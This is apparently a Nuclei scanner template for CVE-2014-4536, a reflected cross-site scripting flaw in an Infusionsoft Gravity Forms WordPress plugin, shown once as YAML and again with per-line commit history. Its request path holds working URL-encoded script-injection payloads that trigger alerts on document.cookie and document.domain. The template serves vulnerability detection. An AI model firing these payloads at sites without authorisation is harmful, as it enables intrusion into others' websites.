nuclei-templates/cves/2014/CVE-2014-4536.yaml

id: CVE-2014-4536

info:
  name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
  author: daffainfo
  severity: medium
  reference:
    - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
    - https://nvd.nist.gov/vuln/detail/CVE-2014-4536
  tags: cve,cve2014,wordpress,wp-plugin,xss
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2014-4536
    cwe-id: CWE-79
  description: "Multiple cross-site scripting (XSS) vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter."

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"></script><script>alert(document.domain)</script>'
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
Create CVE-2014-4536.yaml 2021-07-30 23:01:46 +00:00			`id: CVE-2014-4536`

			`info:`
			`name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS`
			`author: daffainfo`
			`severity: medium`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-19 13:59:12 +00:00			`reference:`
Create CVE-2014-4536.yaml 2021-07-30 23:01:46 +00:00			`- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f`
			`- https://nvd.nist.gov/vuln/detail/CVE-2014-4536`
			`tags: cve,cve2014,wordpress,wp-plugin,xss`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.10`
			`cve-id: CVE-2014-4536`
			`cwe-id: CWE-79`
			`description: "Multiple cross-site scripting (XSS) vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter."`
Create CVE-2014-4536.yaml 2021-07-30 23:01:46 +00:00
			`requests:`
			`- method: GET`
			`path:`
Update CVE-2014-4536.yaml 2021-07-31 03:13:27 +00:00			`- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"`
Create CVE-2014-4536.yaml 2021-07-30 23:01:46 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
Update CVE-2014-4536.yaml 2021-07-31 03:13:27 +00:00			`- '"></script><script>alert(document.domain)</script>'`
Create CVE-2014-4536.yaml 2021-07-30 23:01:46 +00:00			`part: body`

			`- type: word`
			`part: header`
			`words:`
			`- text/html`

			`- type: status`
			`status:`
			`- 200`